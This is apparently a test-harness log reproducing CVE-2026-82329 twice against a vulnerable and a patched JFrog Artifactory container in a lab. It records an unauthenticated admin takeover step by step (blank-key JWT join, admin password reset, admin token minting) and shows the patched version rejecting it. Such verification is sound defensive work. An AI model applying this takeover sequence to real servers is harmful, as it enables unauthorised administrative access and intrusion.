[repro 07:30:50] pulling images (may already be cached) [releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.25] sha256:1734bd9277874ce6a29239fbbe0fe21befa9588ba59b21f724deaee77a4f9c57 [releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.38] sha256:a94c9a8e27a6542bdca359a928cbb50f6aa2732c135291a13e17bde3a5c3996b [repro 07:30:54] waiting for postgres [repro 07:30:56] postgres ready (databases: artifactory, artifactory_fixed) [repro 07:30:57] started art-vuln (releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.25) on port 8082, waiting for readiness [repro 07:32:37] art-vuln ready after ~110s [repro 07:32:37] === exploiting vulnerable instance with zero credentials === [control_anon_token_mint_must_401] HTTP 401 [join_blank_key_jwt] HTTP 201 service admin token: sub=jfrt@cve202682329poc1788247957 scp=admin [access_list_users] HTTP 200 [reset_admin_password] HTTP 200 [mint_admin_user_token] HTTP 200 admin user token: sub=jfac@01m1dy3h3jp2x61074nctg1r1y/users/admin scp=applied-permissions/admin aud=*@* [artifactory_system_info_admin_only] HTTP 200 [control_join_wrong_signature_must_400] HTTP 400 exploited=True (users=True reset=True sysinfo=True) [repro 07:32:38] started art-fixed (releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.38) on port 8083, waiting for readiness [repro 07:35:03] art-fixed ready after ~150s [repro 07:35:03] === running identical attack against fixed instance (negative control) === [control_anon_token_mint_must_401] HTTP 401 [join_blank_key_jwt] HTTP 400 [repro 07:35:04] vuln exploit rc=0 (0=admin takeover), fixed rc=1 (non-zero=rejected) [repro 07:35:04] RESULT: CVE-2026-82329 CONFIRMED - unauthenticated admin takeover on 7.146.25; fixed 7.146.38 rejects the attack [repro 07:35:29] pulling images (may already be cached) [releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.25] sha256:1734bd9277874ce6a29239fbbe0fe21befa9588ba59b21f724deaee77a4f9c57 [releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.38] sha256:a94c9a8e27a6542bdca359a928cbb50f6aa2732c135291a13e17bde3a5c3996b [repro 07:35:33] waiting for postgres [repro 07:35:35] postgres ready (databases: artifactory, artifactory_fixed) [repro 07:35:35] started art-vuln (releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.25) on port 8082, waiting for readiness [repro 07:37:06] art-vuln ready after ~100s [repro 07:37:06] === exploiting vulnerable instance with zero credentials === [control_anon_token_mint_must_401] HTTP 401 [join_blank_key_jwt] HTTP 201 service admin token: sub=jfrt@cve202682329poc1788248226 scp=admin [access_list_users] HTTP 200 [reset_admin_password] HTTP 200 [mint_admin_user_token] HTTP 200 admin user token: sub=jfac@01m1dyc432235811kk5py804e5/users/admin scp=applied-permissions/admin aud=*@* [artifactory_system_info_admin_only] HTTP 200 [control_join_wrong_signature_must_400] HTTP 400 exploited=True (users=True reset=True sysinfo=True) [repro 07:37:07] started art-fixed (releases-docker.jfrog.io/jfrog/artifactory-jcr:7.146.38) on port 8083, waiting for readiness [repro 07:38:57] art-fixed ready after ~120s [repro 07:38:57] === running identical attack against fixed instance (negative control) === [control_anon_token_mint_must_401] HTTP 401 [join_blank_key_jwt] HTTP 400 [repro 07:38:57] vuln exploit rc=0 (0=admin takeover), fixed rc=1 (non-zero=rejected) [repro 07:38:57] RESULT: CVE-2026-82329 CONFIRMED - unauthenticated admin takeover on 7.146.25; fixed 7.146.38 rejects the attack